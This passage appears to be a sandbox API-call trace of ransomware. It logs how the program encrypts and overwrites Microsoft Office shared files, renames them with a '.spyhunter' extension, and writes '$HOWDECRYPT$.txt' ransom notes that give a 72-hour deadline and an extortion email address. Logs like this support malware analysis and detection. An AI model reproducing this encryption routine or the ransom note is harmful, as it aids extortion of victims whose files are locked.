lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x57fe24*=0x1f3, lpOverlapped=0x0) returned 1 [0090.582] GetProcessHeap () returned 0x2c0000 [0090.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0090.583] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.583] WriteFile (in: hFile=0x178, lpBuffer=0x57fe64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x57fe64*, lpNumberOfBytesWritten=0x57fe24*=0x4, lpOverlapped=0x0) returned 1 [0090.583] WriteFile (in: hFile=0x178, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe24*=0x30, lpOverlapped=0x0) returned 1 [0090.584] CloseHandle (hObject=0x178) returned 1 [0090.585] GetProcessHeap () returned 0x2c0000 [0090.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.595] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.spyhunter") returned 89 [0090.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf.spyhunter")) returned 1 [0090.673] GetProcessHeap () returned 0x2c0000 [0090.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0090.675] GetProcessHeap () returned 0x2c0000 [0090.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0090.675] GetProcessHeap () returned 0x2c0000 [0090.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37fd08 | out: hHeap=0x2c0000) returned 1 [0090.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe68 | out: pbBuffer=0x57fe68) returned 1 [0090.675] GetProcessHeap () returned 0x2c0000 [0090.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0090.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe60*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe60*=0x30) returned 1 [0090.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.676] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0090.676] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.676] GetProcessHeap () returned 0x2c0000 [0090.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c300d8 [0090.677] ReadFile (in: hFile=0x178, lpBuffer=0x2c300d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesRead=0x57fe24*=0x554, lpOverlapped=0x0) returned 1 [0090.731] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffaac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.732] WriteFile (in: hFile=0x178, lpBuffer=0x2c300d8*, nNumberOfBytesToWrite=0x554, lpNumberOfBytesWritten=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesWritten=0x57fe24*=0x554, lpOverlapped=0x0) returned 1 [0090.732] GetProcessHeap () returned 0x2c0000 [0090.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c300d8 | out: hHeap=0x2c0000) returned 1 [0090.732] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.732] WriteFile (in: hFile=0x178, lpBuffer=0x57fe64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x57fe64*, lpNumberOfBytesWritten=0x57fe24*=0x4, lpOverlapped=0x0) returned 1 [0090.732] WriteFile (in: hFile=0x178, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe24*=0x30, lpOverlapped=0x0) returned 1 [0090.732] CloseHandle (hObject=0x178) returned 1 [0090.900] GetProcessHeap () returned 0x2c0000 [0090.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.904] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.spyhunter") returned 89 [0090.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.spyhunter")) returned 1 [0090.905] GetProcessHeap () returned 0x2c0000 [0090.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.905] GetProcessHeap () returned 0x2c0000 [0090.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0090.905] GetProcessHeap () returned 0x2c0000 [0090.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x380530 | out: hHeap=0x2c0000) returned 1 [0090.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe60 | out: pbBuffer=0x57fe60) returned 1 [0090.905] GetProcessHeap () returned 0x2c0000 [0090.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0090.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe58*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe58*=0x30) returned 1 [0090.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0090.955] StrStrW (lpFirst="SKY.ELM", lpSrch=".txt") returned 0x0 [0090.955] GetProcessHeap () returned 0x2c0000 [0090.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0090.955] ReadFile (in: hFile=0x170, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x57fe1c*=0x2800, lpOverlapped=0x0) returned 1 [0090.974] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.975] WriteFile (in: hFile=0x170, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x57fe1c*=0x2800, lpOverlapped=0x0) returned 1 [0090.975] GetProcessHeap () returned 0x2c0000 [0090.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0090.975] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.975] WriteFile (in: hFile=0x170, lpBuffer=0x57fe5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x57fe5c*, lpNumberOfBytesWritten=0x57fe1c*=0x4, lpOverlapped=0x0) returned 1 [0091.199] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe1c*=0x30, lpOverlapped=0x0) returned 1 [0091.199] CloseHandle (hObject=0x170) returned 1 [0091.200] GetProcessHeap () returned 0x2c0000 [0091.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.200] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM.spyhunter") returned 81 [0091.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm.spyhunter")) returned 1 [0091.201] GetProcessHeap () returned 0x2c0000 [0091.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.201] GetProcessHeap () returned 0x2c0000 [0091.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.201] GetProcessHeap () returned 0x2c0000 [0091.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e128 | out: hHeap=0x2c0000) returned 1 [0091.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe60 | out: pbBuffer=0x57fe60) returned 1 [0091.201] GetProcessHeap () returned 0x2c0000 [0091.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe58*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe58*=0x30) returned 1 [0091.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0091.223] StrStrW (lpFirst="MSB1CACH.LEX", lpSrch=".txt") returned 0x0 [0091.223] GetProcessHeap () returned 0x2c0000 [0091.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.223] ReadFile (in: hFile=0x170, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x57fe1c*=0x600, lpOverlapped=0x0) returned 1 [0091.247] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffa00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.247] WriteFile (in: hFile=0x170, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x57fe1c*=0x600, lpOverlapped=0x0) returned 1 [0091.247] GetProcessHeap () returned 0x2c0000 [0091.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.247] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.247] WriteFile (in: hFile=0x170, lpBuffer=0x57fe5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x57fe5c*, lpNumberOfBytesWritten=0x57fe1c*=0x4, lpOverlapped=0x0) returned 1 [0091.247] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe1c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe1c*=0x30, lpOverlapped=0x0) returned 1 [0091.247] CloseHandle (hObject=0x170) returned 1 [0091.248] GetProcessHeap () returned 0x2c0000 [0091.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.248] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.spyhunter") returned 82 [0091.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex.spyhunter")) returned 1 [0091.249] GetProcessHeap () returned 0x2c0000 [0091.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.251] GetProcessHeap () returned 0x2c0000 [0091.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.251] GetProcessHeap () returned 0x2c0000 [0091.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346568 | out: hHeap=0x2c0000) returned 1 [0091.251] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe58 | out: pbBuffer=0x57fe58) returned 1 [0091.251] GetProcessHeap () returned 0x2c0000 [0091.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.251] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe50*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe50*=0x30) returned 1 [0091.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0091.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0091.253] StrStrW (lpFirst="VBE7.DLL", lpSrch=".txt") returned 0x0 [0091.253] GetProcessHeap () returned 0x2c0000 [0091.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.254] ReadFile (in: hFile=0x170, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe14, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x57fe14*=0x2800, lpOverlapped=0x0) returned 1 [0091.277] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.278] WriteFile (in: hFile=0x170, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe14, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x57fe14*=0x2800, lpOverlapped=0x0) returned 1 [0091.278] GetProcessHeap () returned 0x2c0000 [0091.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.278] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.278] WriteFile (in: hFile=0x170, lpBuffer=0x57fe54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe14, lpOverlapped=0x0 | out: lpBuffer=0x57fe54*, lpNumberOfBytesWritten=0x57fe14*=0x4, lpOverlapped=0x0) returned 1 [0091.287] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe14, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe14*=0x30, lpOverlapped=0x0) returned 1 [0091.287] CloseHandle (hObject=0x170) returned 1 [0091.490] GetProcessHeap () returned 0x2c0000 [0091.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.491] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.spyhunter") returned 78 [0091.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.spyhunter")) returned 1 [0091.492] GetProcessHeap () returned 0x2c0000 [0091.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.492] GetProcessHeap () returned 0x2c0000 [0091.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.492] GetProcessHeap () returned 0x2c0000 [0091.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e128 | out: hHeap=0x2c0000) returned 1 [0091.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0091.493] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.493] WriteFile (in: hFile=0x170, lpBuffer=0x57fd8b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x57fd8b*, lpNumberOfBytesWritten=0x57feb4*=0x127, lpOverlapped=0x0) returned 1 [0091.515] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.515] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57feb4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.515] CloseHandle (hObject=0x170) returned 1 [0091.515] GetProcessHeap () returned 0x2c0000 [0091.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f328 | out: hHeap=0x2c0000) returned 1 [0091.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe50 | out: pbBuffer=0x57fe50) returned 1 [0091.516] GetProcessHeap () returned 0x2c0000 [0091.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe48*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe48*=0x30) returned 1 [0091.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0091.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0091.516] StrStrW (lpFirst="WHGTXT.SHX", lpSrch=".txt") returned 0x0 [0091.516] GetProcessHeap () returned 0x2c0000 [0091.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0091.516] ReadFile (in: hFile=0x170, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe0c, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x57fe0c*=0x2800, lpOverlapped=0x0) returned 1 [0091.560] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.561] WriteFile (in: hFile=0x170, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe0c, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x57fe0c*=0x2800, lpOverlapped=0x0) returned 1 [0091.561] GetProcessHeap () returned 0x2c0000 [0091.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.561] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.561] WriteFile (in: hFile=0x170, lpBuffer=0x57fe4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe0c, lpOverlapped=0x0 | out: lpBuffer=0x57fe4c*, lpNumberOfBytesWritten=0x57fe0c*=0x4, lpOverlapped=0x0) returned 1 [0091.574] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe0c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe0c*=0x30, lpOverlapped=0x0) returned 1 [0091.574] CloseHandle (hObject=0x170) returned 1 [0091.600] GetProcessHeap () returned 0x2c0000 [0091.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c228d8 [0091.600] wnsprintfW (in: pszDest=0x2c228d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX.spyhunter") returned 90 [0091.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx.spyhunter")) returned 1 [0091.600] GetProcessHeap () returned 0x2c0000 [0091.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c228d8 | out: hHeap=0x2c0000) returned 1 [0091.600] GetProcessHeap () returned 0x2c0000 [0091.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.600] GetProcessHeap () returned 0x2c0000 [0091.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0091.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.733] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.733] WriteFile (in: hFile=0x178, lpBuffer=0x57fd83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57feac, lpOverlapped=0x0 | out: lpBuffer=0x57fd83*, lpNumberOfBytesWritten=0x57feac*=0x127, 